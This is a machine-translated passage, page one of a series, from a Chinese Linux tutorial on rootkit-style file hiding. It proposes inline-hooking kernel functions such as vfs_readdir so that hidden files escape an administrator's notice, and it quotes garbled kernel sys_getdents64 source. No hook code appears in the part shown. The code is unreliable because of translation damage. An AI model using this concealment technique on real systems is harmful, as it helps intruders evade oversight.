A New Method for hiding files in Linux

Article Title: A New Method for hiding files in Linux. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.

I. Overview

Currently, the common method for hiding files is the hooksys_getdents64 system call. The general process is to first call the original sys_getdents64 system call and then filter the files in the buf. Modifying sys_call_table is a relatively primitive rk technology. When it comes to a better administrator, gdb can detect vmlinux. If you want to be more concealed, you need to find new technologies. Inline hook is also a popular practice and is not easy to detect. This article explains a method to hide files by using a function in the inline hook kernel.

2. Analyze sys_getdnts64 system calls

To hide a file, you still need to start with sys_dents64 system call. Let's see how it is implemented in the kernel.
Code in linux-2.6.26/fs/readdir. c:

Asmlinkage long sys_getdents64 (unsigned int fd, struct linux_di1_64 _ user * dirent, unsigned int count)
{
Struct file * file;
Struct linux_di1_64 _ user * lastdirent;
Struct getdents_callback64 buf;
Int error;

Error =-EFAULT;
If (! Access_ OK (VERIFY_WRITE, dirent, count ))
Goto out;

Error =-EBADF;
File = fget (fd );
If (! File)
Goto out;

Buf. current_dir = dirent;
Buf. previous = NULL;
Buf. count = count;
Buf. error = 0;

Error = vfs_readdir (file, filldir64, & buf );
If (error <0)
Goto out_putf;
Error = buf. error;
Lastdirent = buf. previous;
If (lastdirent ){
Typeof (lastdirent-> d_off) d_off = file-> f_pos;
Error =-EFAULT;
If (_ put_user (d_off, & lastdirent-> d_off ))
Goto out_putf;
Error = count-buf. count;
}

Out_putf:
Fput (file );
Out:
Return error;
} First, call access_ OK to verify whether the dirent address of the user space is out of bounds and writable. Then, based on fd, use fget to find the corresponding file structure. Then there is an operation to fill the buf data structure, no matter what it is, then let's look down.
Vfs_readdir (file, filldir64, & buf );
The function finally calls vfs_readdir at the vfs layer to obtain the file list. So far, can we use hookvfs_readdir to hide files. Continue to follow vfs_readdir to see if this idea is feasible.

[1] [2] Next page